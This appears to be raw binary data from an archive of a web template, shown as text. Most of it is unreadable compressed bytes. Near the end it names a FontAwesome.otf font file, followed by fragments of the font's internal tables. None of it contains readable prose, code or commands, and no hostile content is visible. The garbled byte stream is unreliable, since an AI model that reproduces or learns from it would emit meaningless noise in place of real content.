�v/��	��#����N޾�^�x���B�:��W�ڼɏ��E�vR4q�U=zjUdARK�]����hl!�W���uB��
m(c��'
He��t��o{R�}$oEb��?����ˬ�A�y�f���C/Ο�{�ֳu7z䒏���XG�v�����-W>���_~�kϣ��񏈔�v�rți�&!�*)��rI���b@�쪖%M5Нs�!N���=�3h�%`�U3����yV|���p��k,6��խ�]+{���EΗ\��^����yn۔.*Qz�MO��տ��D���'�T��S\�0�WU'5���:�#�h΅A%�EZ�ʜ5b�Ҝ�6M.�^q���Ӷ�X��(��1���]l���(4��A���Ң�ۋ���VXkv)^ۚ�n6�e�Q�~�q`�a4E������l�Z{!����e�ٹ�R��fm��wš|���N�wda{%Q�	c�y��g��R�����A9z�X�BN�|5�ّ��O��49_w��9������.���f�o��(�D��\EPl��~�P��ˢA�'��Ǐm���� |��)�]ˍ��1��<|`){��y?�J;|Ɠ�=���J7��M��MA���~we����H��b^;+��4���T��1纲ѳ�'ZNWR�f�Z�x��
R���}�����E�ڢu^���}�
����=ּ3�CA�lC\�'EΩ)�.�b.-��GB���؄��HA|ZE�y�˭�y�H��:��$��'�X��v�3&�y�VQJ/����I^����	�'4Z�Y[}>�ēn�����ѭ�ţv�To�w(�kxǂ� ��Կ�^gWzۼ�r�1k
}Pc�.f�ŝ��L@�^�-��7�pj�o����rͤ�DⶴppKt��r��U}�$gmJt�AP���v���h*ٲ�͛-���Z�v&�dH�j|4�P�9���?]]zw�� �w���L�����z� z�����Щ!�.+',z�b8����*߮$����jΆ,��7�bC���o�/�]�E�h+��#PN��:
��<�D�S_S4;��LG������V_�!G��8��ʜ%���gq]�wX���\z]�B�W���λ�z��TS�v��l�������V�+#��ᡜ��������L ��W����ϛ=�u5�f�]�Y:�5tgq8hĢ)����+��<5d��P�:9�?tun$�{`�Y���?!�&]ܳ��p�a���R�<�ұ�nk}�DpzawY��$�z�:�ߓ�Hz�����dY�Gj�a�r�>��q͸E@��G�4�����+������5|��"�E@������8�x�y>�XqI��3%�4&���Ueѣx�ޜ+�V[
W�?�$�U����7���H���2�ܘ�m
�&�{}�3�}�������`RU��=}ii*��"Q:��, !8��6�ܤP�'�T�s���rvw���MDKOx���inM�'\W��	mF���f�P��O�V�
	��\����`���%~�J�JvCm�8�kv9�E��g�fv�G١�w2�0�$�-�\��I�MD7�Oۺ��rU��:Qڃ�1<;�	-���:�z�^%�q��B�ZK�QD���{җ�x�oe%�*p�7|�-t<^�xأ�bT��*n��}�ۙo��˞�(��ﴲ����\���^(�Zn��3�f��Z�,2��:����"��n�@{��8,�-�^��wQ���R����E~����'>�@^U�>���W5��%3#X�5�"߶縵�mw���#,�,�C�8閅�W��O=Ļ��H�7��=ζ��:+�
ᓞ(N�<��n"];٬�D


+�M}�Y`��*L��vl �q����Zf���u&��-��A8�M���������6u
t2i{�5���k���
	�v@����Jgv;1ph�Pu�2[�p��C��Um��
�^H��n�|:�}���Jt�8��2E����l=�U-�ӭ}����0��s�	.>Q����x��T��a7$�m�}�;aÿ�mk.�4���7���Kt݋�B�{����Z=���+�I�����w��oN�.��R�"k�O5h��a��C�K�0O���P�$�/�{q�u[��_f�_".�w�y$�8)"oX�;3�4Z'��G&���o��5��gȬ	[�푂p�x�$~VlYy�?A:�O0O.?Iv�{��~l�z]%��x��դ�1�G2��
ͯ�4`1w����^��"B�~��<׎k�h�:���&�9D�ɗ��@	�I���4<�l�C"�`��6���7Ћ�콀{�=V�+��
`��T�U0딎��s*Oʏ�tj���y�2�Ϡ��|*(Tw�l�d��b�nQ/��7Z[�i}�hím^��W�L�m�?�,/okkX�Ft�����+�-��{V���X7�NFd���39�ȑ�V��{\��o��o���7*:�^�.f��=g���
;:uP[�u�+�Z��P��ϸ�u~({��������R���ʑг%�?�L��'m�O#��8�x
��$N>�|�ߖ^��y~r���׮ۙ|�,y-�n��Q�ߖB�N�"n���%;Ts��B֭f� =3�EXX�7�W
��s	��i*(*+"AC.��ڥ�+�:����WR^m�SQM��z+�.� �sS��!�F]��bZxL�}N��N�
�$��pgv��E��mA~D���Ph#�.�0k���㲧�o�n��?��֭l���/Ox��$]��L�`.\(�P�+:rj{�x}cO���#V ��̥)�:��f���(ý�Q�� �ǀ�*��[�յ����~�-`h��1):����ҙ���n@-��݁�'>c(�����>,����U0�.Q����/��sU*�k�ޑR1&&;{�=<�	Q���dÅR%����R�	�����F@"��z��EG1�M�}<*:Q�5	��zW���՟���D��Kj~�_������[#������Z���/��9XMF��ۇ{��7�ș���ک�����+�h����sDf!!/���y��{ܸ��=��g0<���)�8�4�T�Mʦzj�^K"��$L�+�܏�!^��\*��d%\��%��N��s���$���Z��:˼��&�,�t'U�}�~�#���
�\���ɝ��/!-�mY�V�B-Ei8ɷ9���2<��S~N	K۩�p�'�Â���*�֜�wcWF�c���K?�ZAJ�ƺ�p7Է��b �i����KL�`]��gɎp$l)�q�����ҍV�B�C�*c�K�irz!�3�ڇ���|0��F��
`�Z�B�Q^��z}"!թM���r"�[�R���M?����� �7���	�dLdH+X��Tp�����;��߻W����3��k>j��W]�[��т�QT~�79�E�<�r���jO>�3�Sѧ�B0�n+�\q�\Xh�;ed���I�x��6�>� ��XC���Vr�pN�F��K�|99QP�ba-�~
$�GnX��?:a.pf.!®C�f��߄Z$����
���ݞ\؉j����rv�b�1��F4
%B �B
k"�r�,$��$��\�7K��5�s��n_���+����v��� ��P$�ϩ3�/��x�>J��aw/��T�i�X�F�N��)@��ԅA����K$r>�G�nc	Q�R]
��]e\C w^�ʺ�𑞯W6ު}LB|��ұ���61�R
��pn=��b�>@k��D�R��ƌB�<d�D�OK���gzJ�2�mo��zMnE�}EKG�W�䷔H�C�	i���3��<I>�MQ����n�h��5�0�qb9jC_�~P�o��a��ʀ�1�>bש����i�v���63u_��;fj�/1'y�9�D8�a� ��n+.Z��fq��>�Z���T��Οά�s6����
���w�V�@)������w1����`�h�	�|Zw������U��i�a�{�]�"��5�X� �M��DXfl|6�b��3��Z=c�d�dž/��bWO�����g�L �Á^�~Їo�;Lx��0e�_�Z��,���Cõݷ%�"����({���>��9�6?���������C��`/���}�G�(?���Zi�	�6�m��	v{L��3�Z�[a��x���'�96!��1�2�'�p���ͥ�[�˔�)�)�L@ƙV~+r���2��ʑkk��9�Z��	0NG����2�5r�aQJ�#�+�Z�,�O���h�O
�:��X=`�O��0���ߋ��W<�N�;��{[�����e0�^�G���ݬ�-{:�&ܖ�V�O=t]����4ƏKF}1Q�WP�y�@O�~k��[�+��c��D�����@��k,�UB�#ű&�rC��e�,�/at[XOd�Ԛ{-�@�a�i` Q�/�
��B�X�I�HU�,}�Ȥ]�Oy�,�����tGd���.@�뾄���}�ۀ���9S�U�W�!O��ҕ��`h��?�/�=���
 �o�"���:8��A6VK�#��X�����Iq�q�K����y,Ѹ�:^PAu~���[��5���<�`d��l2u���v
6�5b��ǭ���K�v����o�����
�o��
Iѐ�8��0���M����	S��N����&Q�%�����x["��:�v�EbJړ�0��K"�`�G^���!�ܾ�3#G����WT�b�Aý'���4I��Io��5�K@�d)ƻ�H9eW�`��p�[��':��q�\}���4=�@D7�Z���w�Y5����06���Ә��В� �*)����z�G�S<.F9"��Ca�!z����[�~�P>��ݴc��ZB��b�4l’ٟ��s���ԳܻY���j(J��՜�:�qZo%9" ����]c,:�Zr�PA<�@p�/�"����
��g�]�[u�o�W�(�AǸ3aI�L/��)^j��_��s��;�_"����K�Y�		mĄ�"�oj��=1H��f�Τ;F ��
U\V>��{��9Yc6J�?x�̀W�0M-��7�ؙ���HrV�2
��I��<�����(�����
5uywjBt����A���֏o��\e3Y��L\�ʺkl#s�s���˯�G�b�/k���BZ0��r�D�h�D�q9�W���z�C�8 @���C�4������.7��U�{_�\���_}#!|z�(12�O������d�@�C?�x7�N.?y�jvGC��Ҍ��"�ʚY�lC�`���2�'%��b[iܫ6���hLF�
�HO]������
�M���"��U��1�P��
[���9���������X��
�|U��B���� S~z|.�4���TP��{.��b9�p�y�-�~^z��
�\��@J��X`n�bDWpk9_c,:�2�Ya��FμҦ׭b�1���DLc�a�u"ҝT�T�7+ov�z�Ӏƣ<�n�siDw١/�ţ�����3mW.�{2+ا���t�b��J���c�"��9����ʓ�����8�lɭ@��Ѥ̤%�>i�����O��������~��}$��f}e���]�Է��9��9y2�6WL���u�SMv����q��9t�)iG׉��0���6��G	-0I�#�u��1��}ŭ[c���z���6WŁ!-pi?K����8�'`�PCrr������p\���B;�k�i��~8�߯I��{'�D����ʪ�J�"am@!�B��S҂��� �?{���łk}�Mq�W���W�,/���R+O��C�[��Yw3|c����k=}Q����c;Y�4���������ed6n���گlc`��,�ɩߤ@7iM��=���Gs��4g��%�rG���p�H�C5p�#��S/ڝ*���	ϓ]6��}�N�x����������Er�P?Sr��b���O�{Q��p���h*L���b���YS�n�
/�BZ�;}�m~9a�4����-�h�[�����͎ϭ�J$�1��N�&�|'�c�䬥/ʺ��&᧥�,��/�94�
�g��)^D��/�P"�܈Edӽ&S#��pK���D��D��
�Ț���M�9B��4G��e@�f�~޻;a~�WOk
�CL�� T��|�;��v�)␳aH������z�=lyN��S^���xG��0�f��x!e�Ƹ.�9����\(
�(noAiO�@ut:)�S�P�U6�&*��B�v���pF~�[����@���]���J��a0��dT�x͊Z�С���q0.�W2v���1hd�-CZ�V�A@�G�ñ|g;��=E�4�'K<�@��|��4^�q	|�\���V���1p�%[�#S���#�F����#��-�C�I����̥�+\),�Wyy�:#��s�Q�����P^<���E�/�P����Ny����ߞ�?)��e��S��b:	jw�na����\�T�]n>,��Jz���F "穼�ƹ0-���h�����q�(B?���Z{)���6{�o���ݔ��2WC��tˋ��g�5�T8�����,+O�e0HU�ܺ�vRrA�D�
��6���ř��!��D)n:��nc	�a��=2�ݫ��ws9�O�Y�V@^��XI�{+���#��b�����W��y+@%
��0.�{�'~{d�z�r��/�ێl����L��*b��d�_����Ec�f����a�"�sص�-	��v�$�95�]�&,�̋�P��L�Y��$8�>���=��[��w�<*	C~�$\���Y�Y7��W$Y���^��q�F%E����A�W�Q�7�{����EH2�C�)C��u͔��.w9A�Yȓ�K������c������d
�Ị�<����w��TPN�wb���ԡ���"~H��6�6�_�0wnDKAAN���e9������iFVg�?����#���|�����ּ^2�|�Ś{�A&�X�|��[QhY�^���oG|���#W*��fe`-�ޣ�\�6�i��˺�.tu/^��y���kA�������/�˙��5��n�nמz�]1���Z[ϝomV95˅_�6�	e^�^��!M���M���H�чVx]m$��Տ�KJM�4F-��oQ�C����2����3q/�T�]�)�<6.jxo�/|CA^�[cB�2��|A	�{o�1��K{�2A`O��F8��;��' ��9ƀ@bR�]ʷ�q,V�o�<*�l�^�ܫ�QcT��_�5?$�U�0_9׊ f��)��C��ץ��)���י�P�["q,6��
���<sZ�mNv.
���.'��
Ԝ����}9��P̂�$
���h?���˃2=��+.�#G=wO��G>�#�a���cd$�\�ـ����ݻ���g�y�Z�g��v�b���Էaz8�{ț}Bh�A�{mD�����.��'*K��Oik;��D �#�����/h����;�@��±
!��+�ګ�-�c�kn.���v�$?:���ܗ���b�{��az�K���ޣd�GkyVֶ����Z��ͥ:��'Z�sg�.�O\/+�i�.��5j�>(��=��>��v
��w=7\�4���߈y�~)��qNKs�s~�9<��k
��{d����o�Þ;���Z荄��A�R�4�vríḾ�Ѳ�ʀ���&�_>�p<a\&�R�_q���o
@X"P]TU�0y��v�v�w��t�]�U՗�i��<C���i�x=c1v79�(f�
�M�k�ڄ:�'ڪ
�I���`|y�9D��5�n��U:�C+/>9U�F(#eI�|�K!����l0��36��n�LG�e*6Ne
/ˌ�Ԏ�Ūjj՚�w����e��7r|т���֔������讞��
�A�Z�S�Cr
֔B�I��nt���~�-�#Z�V����v��L��Br��"9ŗ5���9��8V��x�h�_d^�:�|xmW(��~��
�M�y�+�)#%ʂ��u�����~ޯ���щ�*���K��X����<���g��7|`����z��H0���ikY�=2�����n
_��u�X��GWVҹ����Y]/K<J�Tdn���Y���JM6@��rݍ��N�bj���D8�| ��'�+^�j��t}���΁�bFAGĊ���̃��/��c�D�;'f�{s�)y��'�	�K17���E��m�蘷Ҕ�k�<#���ꨏS�I��V�:�	�e�8Z�(t i��@>�8[���4XL��{��J.��.
5|E��^]sҝc�C~���L@�!=�I�uz�m�ʐ^��IU:���d���݌a?a2h/���i�y�;��nQ����o �(�����&�=X;-�?�vkC�)���fm9��ҟE��f^��-MזJ��=�4o,q�˒�i^�X\lX޳�ۓ����{-:�������V{��??�&��*_i��]�Ţ@����T~�9{��U�p��M��Xא�j���S雩W::��@V�Vپ��=-��}_e���y{�Ď�^�g�if�h�j�r�Ԯ���0(��w90���{�T�,OT�<~
����>ϷXVX���8��^tΪ���/�����y
�F&��$ZL����ȏ!D����Hn˃8�m�����L����:�d�J'�!c\?�<ƶ}���@}���������݁
"'�||�2�_}��W	3:����}6)X�.�邈�I���e�mś�[�:ޝ��r�m��L#hd ��c^o����;�6��a�!m����L�S���
>�n��N-���j'�9BP�B��"7�%"���J�<��Z���)�
}�B	�[S�����gԓd%���7
�O�M�mf�Z�dQ?��8k����
��8V��jW��{z�
�5�zՄ���ff2!�]�J�7�����3��Cƅ2P����,�Mw��ǹ���*)��5H�����% s�9ҏt�I�TH��'�~�ic��K�"�~X��=~KH�^�!O�q&�
�"�^���S9c*l`t��12�2�Q�d�@���Z1�N���[
:����H\��t܆���Ce�S�S�R|D��XECyd�hp�9@<(�+�����$̙4���;.9댋)5��d�e�s׷z$���U��f����{��<&�v�$���b�)K��W��T�����R�8Y�j���'��?K^GW��{�o%8���dw������J�g�M�z	3.��7S�[�^�n�?�ԣ��l���C9�Xd��C?��5{/�����{/���{� �2D{D
u�wo����̧���
�Cj�c���T�#Ț����y+L��@w1�����c�@�]��?�|���K��9��d�X�����e,r���755���뼼�ِ���\\5A���	�7�	�[��B�~����b��s�^w�E)`sOrя)eަlCZ�@Kg���ߝ��z��/mi�M)�|D�R�ѿ��=���/��|��pzW�PC<��x�u=(9�m8m؊�-LW��.n:�Z}w杠6�
w�$"��O5��t�5����Nց�;&̢� '|^0���R�.�T(|$p��Ȳ���!��M:�
toTĦK���MH'������O��|2�6N�5�k 1J-�1�YYs��ViU�8o��fYp�s�*�l	�/�Evs2J��/�?|��Ÿ�F�b-�VAcF��:���l�l��{类�.K�M(6MYW��,3��w���Ec©Q���<
���CT?�l�7UZ�����*��{E��ipCT�4�c)f�(1/�Z,�O��,��T�eE��C���kؖ��K�,�KH:�&��#H���D5mrH���?3�Q�F"���D�Љ���6��ŷP�>���	!�Uq�u�.��f�c�^�t��X�\ZZ�J��9V]�бو+|�f��q�,��ҏ��A�_/儘�(#� :�Γ��k�Q�n��~C�
����<�ϳM�f��ɥ�$<;���e����ڤ1%��i���EUg�q*;�R��1=X��hW`�VU�r7���.Y"�q��y�W�(�M��&��q��ψ��b�)�c�����Anj�I�W4y��tҝ�1���Q�܃��j�	6���W!h�d77�"N���˴��:�C�M\t��i1r��[?Ѓo�{�TEz�r�	�6��k?Z���Q[���7�/�����V�{.�=ծ�"�+����9=� K�Le,`S��w�9oW͡ɓ�l��
�_��G�׆aR�0��e����_ǁu���5��X2��k�>���[�:��k�ї/7:�YÒ���+W.1Ad�e;�f��4�����Y.����H:��^����θ`"<�H�W��G!�u�M�,�Z@LT7�cC����ގ���
��>�7%1��$E5��:D�kP����2r�@����5�����ݕ+�Z����f}��G�
7���R=�4GOb��T˷�
��ώ�#_�w�Taҳ�j���t��[����H�	�-ys���G�d�h�Au.Z�54N^�����R�ӲG�2Qё��\I����>�]zP����=�>';��r���?�8D�x[k5j�4I�T�U	�W�0�*����hڬ�Fg��LRg�X,���cA�!����*��}%��s�Y|�{�F����+���u]�$�_oI�r+sź�v8��s����R���?,%_��'N,�8+ ���kħ�F�gd/$[�5�'��Z�ǡ)���A�{P���
{�2d��fܥ�C(���QU�g1�r�\;�H��b��b�τ�����e+lI�"�"�Ӝ��
�.�?��>ik����V2Y�r.��6�ы�<�OF}K��lc�+$�#˧{ɘ
6S�9Ґu����d���`���*�ٕX���5�=��e���ou7~�4�-�x��f��&�|ۼc���;¼�,�Z�_ݥ�&k㯩���\&��cwF��c렮7��ؔ���WK��]�}Q�Y�:��HA=r/KuWT�7���Voi�������;�Ս��+�ݖO?e������m�+�9W���*�3���M��u=��-�ZR)����Q�v!E�Qa�(9�P+Bv�{@�E5�*q�]?�����vS���!W㐸�7g!�N���£Ir��WO���ԇdmb���W�B���M�!��*I��>t�3<Z��o��30X������ܧ�?�y��I=�5`ռ�4�j�M,��Cy�=�o݉�TpGX��Fo���~U�o���+ZmG��z-�V-���;z�i���ʁ@�5~c8{���n�PL�T�{���+�<�T4��B��-ܾ[�@A��d/y@e��A�*m�hɛ��03�N>�9� �3��D��˓���ʬ�������y�*{+�I�fD$5w����[E�G�e��L�e�ur�H����1�����T�~ΧtWyw�$vsj�f2(�d���F�g]kSz!~�']:4`�lyi1�Yʸ��7y��T��)IJ��u�� ����^��ճ�ķ�'^D��v������IwN{+$>�|��ؿ�z�Fd����a�����O��bDL�{̬��o���<5|�ʐ��-DI��ߚk���y�BoW�+�o���^��'^N?�� =8\|7rp0�~Iq��X��������3�
X���dyz��l���0�E�p)��K�d��BĔ,�D�K��Ξk���m���?^$�fRd9M"Q��%��ƨѣf�H��ç�]�9_R�U��Aq�}<����=�^��F-ڋ�V���욽Vq�*ĝ�/s�r��������u!`D����[I�w�=)	Ek�v���kȿgou�S�,`����*糣:�g<�N����Ͼ${֩ڗm��ߕ�˻:7m�L̝VP�	���Zo�x��\�b'C��L}zq!=Ew�
h8���t��[�F3Xc���Xru�.�$K|�3�b��8���r�ҋ���?Mzbި�A�ԧ?�k+Q��=�JZ;T�gr��]M{C�}BK��&0��F~~�Y��:�P]�\��
B���T�*&��,F�u�U�y���`H��n�
n��
F��|�K�ln��x��\.���H|���Im�,�i]�&�+C��9�DZ���7�+�g����Ds��>���������mb�|{�{q�Ouye�ڬ(+7��oʈz0'�#2�VQ���ǗM�E��}�
��LK�4��~�I�:�ֲnj5'J�e9wse>{hP��g���,��f!�k���土^��Ɔ��l|�w�u|Ñ߬�<e��͛�ԝ|wZ@O�iP��	�l�ns��S�֔���L��|���Br��%I�Р�u֡;E��R,���Mj7���l}�-[���`�p���ɮ�0ف.u��I"uCC6�L���N��-�J�b�;B�!� ��~)����4dn�dNj7s�'�E	o�9J�	n0���p�3�;����̝�07*]�R݇�Ɖ�C�� ܙ<?��4���?�{t�q����������b�X��ݰ���e��m�7��	�	w�v�C��l�W�j�m'�|[d��>���D�Q�x3Ck�p)���e���C>��Ԟ$�2f=����:H�h5ڢ��hF��L�,@��:�����E��~7��BV?Q#���3QA�.јڬ��xW�uj�T�a7`N�"�*�kKbY��JD�:
��,T����3sq�%̓!L�ooP�M�Z~8_BU�h�2|��H@�����m�Ej]<��m��	wFɇ�|�![��$��Q��#�z����T�֞N��6�		�讎�HNb!b'r�V���!R�n�&>w���w�������)�rR`�><\��|�a� 	��+��Q۹o���=b$Jh��ܒ"A丄�uu?�\��hG!�7�˽&K>��p50�E��*���~#>ĤR�>p8%�q��{��}�#��p����q�Ϳ�fOG[pVa��rN�v�
@`H�r�r��UHk�έ|z��g,t��Q����ͭ�Nb��)��Y�0G�}ws=�?1�]�Ο.:����X��ӻ$��V�ލځsw�/��@�@���{W,}v✥"Ըz����EIIK�U��ŏIe�P�`��fq�4ꒀ<Et�\|4:C(zm�;n	�ih07��1(�XX�b>�y]%]� �-"Փ9�s��zRi� 
٪Ӎ럤1�!�Sj�3
��^��-S`Y9����%̥ʒ�>�2�.�-}�pѷ��7��^�-R��2�U�[��KV�^����j��]�N牅�a��"}���-��|����� k�2a�^����!b)-D��*5�7ho�Ѡ��J���?\ζn<�o��Q���0^�06�%g�>)�f��U�*7���U��'��M$+���6_7	Ԥ��Y�|j���ip��UzǵA�������[���.`�{f�"[ꨃ����H17�0��u eeɲH�k.���a0<�bGQ�Ji�%��_�+!���}W�jۑu(Gkf��EsF�/�r�yy�#�X5�F��H�Ʈ5��Y�e��8<�1g휨�}fP�}�,-�^_�J��Ϸ&}$��6�vƸ����e���o�0��?�
{�d–�"�+�=����*��c�y��xy�Z%�=vS#C��9
p"8*�^Zx��7S�͊;���s���_"�̯i��#'�+*�q2I��yl%��E����^[Ɖ��7�8A�-�4�㋲�.��A�uF�EOZ�a�;R3G�F����~#�ž�T�]\{jg�W�X�~�<�pDm�E�ݭ���Q��G�C���=p�$sC�T"���Y�uG?��1zˠx��i�v�5:�h�`��亟#�*�����,����f�#>3e�Tu��u+(�l�:��*o�w����Q���ʑ��GwE��8���w����U��՛�n�K�-� �͎K�M��r�9�]�ay��+��2���p+ҹ����x��?�_Q{��(Ƕ;
�-!��1FR9n�f��!������?n��
 cD$=K��n,P�Yg��xq�ͩ�'C�� 
�}�G�%3Cg�Q�Ӝc$�n�%lcf�Uˌ�N�^�ޤ��M�-�'KV�Ϛ�9�y��e�z�bQ��ȵ��ƏxT�R�Q���5~
^��u9g��3�f �{��&#T��u�H�8%���2t�):�N#�s�??%��?05����љ�T*�R��g�)Sאy"҇SAܻ�錪�)q���R�K=W�H���=��.(<���>L}�,�7�汫�Ǝ��P��� s�+�fI��X\h���;s�b)�.V��Ħ,��|pU����YY�
��}�0ӐT�z��q�M�eRp���-NS\ �.�]���H�d�v�i�dK9}�dqz���K�5�nX e���5bF���6�ʍm�C��@;�?�{R,l�=���p�e��(��FM-��c�<�:G�Нn��喊����&R�aRV��z*/�ҴT�#�H6����v���#�I�(����V!QҠ��G���߄�+x�m2k3����zU�35հ����2o�~Gq��r�v �����*�
��[Ւ�C�[~:�m&��$�4ij��B8�4|���؍pH��r���+ƺQ)��؂�I�
�<Dmh��	l��H�7Iy�C��j�����AG�@���^�rUe5��ôc�G#[!C�"J�Tܻr7+LUʻ��|%�#N�M�6�t?&���B��D�o��;�<>��g�H�S��ba-ui-��l����/о�0�\M�}K�?�FdD��{=�{<ԍ���^Ѡ��;��|x�݋	��]94j���Fa��f�|�l\�Q�!�r5��3L�c6�?a�a���5�c��G|�-����ls^���8�%�6u�O��9�Q��ǟ��nXIx����4paܽf�ζ�K~�?+2yIb)��;�(��J���Ε�FH�����+�*1&"ɰ��ɍ���P�a�%'o�f?���cO�O�K����8�Vz��M��é�cg��֧�6Y_}�	�o��m��+zgT|�VQ?'����"�x��R�;gO^�L��8;��q���a��ߘl�Lb�L\�Ww�>k���~[gwk��:��>2}Z�B�{��W
,�w�&�S� k��a@�Ը�?�6>3����n=)?{�2���������H2,)q��H`��ޕ�3jkTĞB���?��Qm$%�)�����}bU�q_�c�qY	-����_�1Ӂ�)j�?���E=7>��-9�6�l���.�� s�x"�h��c���[��y��7�?�N
-������ T��K�����7�9�|�Ѱxz�j�gmh�I�n�H�o�g)�v���~����
C�;L�Jq�u��p��mW�<���˗=l+(�lCP���m-�[I�H�HK(��|LQk�g�ª?C�EBx��}QN�"��;��FNU��cE�\k5E�G
н�^Jv�<�+��Dk���r�K�C�N
�w¹*�{�����Ϛ�>��j��h��É�W~{�|�k�ÿ��$a�=�����g�1�iz���f҆M��m�� ���z`��0X�*��+G��n�� ?J�>�[St�d�>)�`zdM���+�9���,Z', į>cu}n��mĐ�N�=�z8$Rգ�3�c��1ME��K�Y�$����������
5�
�]Y<z�(�����:�Ob�N��A�E�5إ,��/��-���D�ʰ���sU�2
b�C=���(�F�sU�;ˏ(.��&��@÷?K�*ؕ�1���E<�
�|g�<�%u"
���kC�D%ʫ��p�zE�]�h?�*d�Pg�\�R
D�ć�U�$F��&�i�橇�Z>^=xܠ�KHUNy����xU���q��Y��d*�gg�mnL�%��r䰼!�@��Z"��["(�͘pf��k��"v���$�ρ9&L�I�Q����V�:���WIZ�k�7��TT�!�X�52Q���I��e(�Z���P��
b��}LL�ϰ�:�.'���T/�k�S-�>���l��T��5�}T�r��#�e�(��S�G��:�'Wm�P 8��oV�V����7S*��6⋫��-���7k�I�5P|-�w����S�X�����-g���`(�T��zI(j�aZ�c^�w.��8��g-�fV���]hl�3.yO�u�2&������8EAD|L|Z�3�ɡ���2�]�ۑ�5�KqO�[�شܵ,Մ>�k*���j��sέ�	*��Ѯ|\�A[
��T����O��=5�@'����z��=]Z(CGE��fM��8�G�W��P+q�NE��m�F06�8Z:b7���-�Ь��%�{��Ch����1��^t��m,R��\��H�T�Z#x�㮽���`��Y�'���}?����}��iou8�K��P1�����㥙夆C����������Z�"�8������@x�
µ-�``�Pj�}6Ll�R����U\�6[��CZ�����N�"��*Y���=3C�Ⱦ3���ڣ��x~���,ce�G��;�,5�R>U�w�6Լ�SAR7|aq��u��^�ځ;V�`ۼ<��V�����V�HɪE-�3��t9Ʌh��G�;��~V�n<r-˥������V��?�%�asR�1��>:����{�~۔x�9:�7N�+m1����f75dGr��z��ZFݬ(:��%�P�
9�G��a�xLI�rl2}���>M�n?��K�wE/��:T�@��Y_���a���^O�ME^3�	����O��\��������s

_�^��9$-�Q���5��y�'��m��s���с
�c�v�V �I����߇�!?�I���$7�ܡ�\ód[�#���mH��܁���F��&8�$*����p��w,意�hiḩt�-,6�i0��I�^�,`�Ś7��{~�5Q�R<?OȊc%S���(��D<�Cɓά����*��r���W/�<5�IT���,�y�P�	��4�M^�V˿�׏��e?1�M��BO�P��<qBT}��6Z	|.<��3p�G�2q�Zoݹ�p|UNbUqk��w~m��9`�L�E�E@Ka}��!,��/��p���7���b�� ]��G�{�����O1�R1��
;č��A��&���u³F��?�m	��]��1���ϛ�Gg����돾��IY���ƃ�#J��j�aZ��z"L(�Bz~Fq���i�eU7m��4/��u?��@��H���	D�B��L�����0}*�X"��J�Z���
F��b��N�����@FP'H�fX�DIVTM7L�v\��(N�,/ʪnڮ�i^�m?��~����(N�,/ʪnڮaBRic�0N�n�q^��~?��yd��=#?��j��ߴl�|�`�p���B�XB�+��J�Z���
F��b��N���q ���$
����")�Pit���py|�P$�Her�R��huz��d�Xmv����z@��H���	D�B�Y��`��.�/���L�P���No0�����p����?_ �%R�\�T�5Z�!A1� )�a9��d�Xmv���x}~�	e\H��u�Ӳ]n��)�&�q!=?�8Q��4ˋ�����q��uۏ�s���I���(Ɋ��iَ�A�I��EY�M��8�˺��yݟ� #(�$E3,��$+���e;��a'i�eU7m��/!��m)hrYzb��3�3�S�H`]A�Mx1A���>]���5�j��^F�i�T\?8E|ӕ��_�e��oH{U��Ġ��T�&L�-3�QW�n��Ԥu����M������*
ۥ����D��+�%�j;�b�ͮ�' Y�>
(؟�4��w�]|���/���JW#Ȥ�Zca7�����B'8:{�} ��N�$�8�o��Q|W���� �mOnL�)��Q^!W��CM8�}:N�hۑc&4ٝq�o���_��@�xމ�ɐ��5����
Q�+�t�*\��]�w	�C!�W��^"�yw��n������e�/��R�=�`���*��5b�J����z�MwZ���N	h��PQ�7޴���-�␜�E��g�����C�29��*X����YK�Uk�&D���\�4����]�aw�-�5�&_kD�@�;���I1f�ͫ�{�C�[ŏY}E��xd�S�9ɇ��@�~��$�`�K��P����K}���=�wv��ZR
?P��h{�%���Zdϙ�'�bi��ys-KhO�ü���.�� [4/%0y�]�|�(��珫D���Bˀ(�D��뺹�"�c��fw��8��Ng�P�m���zd�o*Ģj6h�n�i[�}�iY
L�ٱ�E�f�9��eF�8�d�ǣ��O�k�@�p����#B\���'Mo�=�)�
uĐE�B>:��6Qlo�����6��]�Z* �)�
˸k�ֿ����� �/�d?6�
Q���7D��x����'ey:��K��CaM�۽�T&�uf��T����x_�����W�D�){5�PJ7�A�����2��wW�q��o-C��g*�����te�
���j^"�~�4�{;fo-�W�?��*w�W�1�{���|���k�.Q�Z"�
X�-��J��/~������۵�dp��;�<W����4�M�S��/��+�En���ش�0�;��=��N���{�3����!�Q)9]=$}���޵���2����K��Pg(۫PY�)k�揚�f�,�}�eK��fh��#�*�3W��A+�����xv��fe��+�+�,��fTr�~j��)	�[Tn����*��4p��]���W1dz�%�f��5*y�����W	��	@Y�9~����Ë���Ʉ�T5�X�ٳi_�q# �;�����K(�56�9L�FQ�/�R���L��EE&Rz��O�EK��-�Q}Y�kv���
������qsOLc�G�2�h����n⪻� :`�֥��$����ǘ7UѬr���_J�Q!wJ������:6���m�纏h�%��b��4����	�T�M��_�3\j�z��Fs1g�.�c�b��G�d?2RY`o��;�����2u��%�{��^r�)`+�v��۳������7�Fs=���CuC�{�C.�=Z8kV�Ye���`�Ԯ_Y�ꓣUu@�i��R|:��^�y��%�����}.ӀT4O���.]qq�Z-v.w�e��i��������o���:��f/1I|F�b���D�X����CE��?{���U�-Nx���0�w���6�~U�~}.x�����c��f�!�6�x�>�}�WAD<i��3��״)�>�|Qķ��~������X���C�����}���<A�>�������6cT���;k���#7.{7c��8�T����_���4��X��;B*bm���#"""*��RJ)EDDDD����̛?9��7���t3Zk�g�с�hz�������t&ޯw.���Y�N�ˋվ�gH@E���!�6����~b�rݴ���z��]DDDDDDDfffffffVUUUUUUU�i��{z�����6�Nd�PKԜ�\1��˜�3purity_iii/fonts/font-awesome/fonts/FontAwesome.otfnu&1i�OTTO
� CFF 9s�7���EPAR(�l0OS/2�2z^��`cmapǢT��head���6hhea
��P$hmtxJ+��t
�maxp�P
`name>$#
h
postx FontAwesomeC�������������	�U�6����U�6���2�2���
�",04<>EGMT\_ehmqy}�����������������#)4>HT_lp{������������������
'4=GRYfoy��������������
&,39COVcoz������������"/5;FPUZes}���������������&+16<EOW_hmqv|����������������)04=DPX\aju����������������(,26GYhy���������������%16;>EMUckox��������������				$	5	G	V	g	l	p	v	�	�	�	�	�	�	�	�	�	�	�	�	�




&
*
-
0
3
6
9
<
?
B
F
O
_
c
u
�
�
�
�
�
�
�
�
�
�
�
�
�&5BQafmty�������������������!%)-159=AHLPTX\`dhlptx|������������������������������






%
,
3
7
;
?
C
G
K
O
V
Z
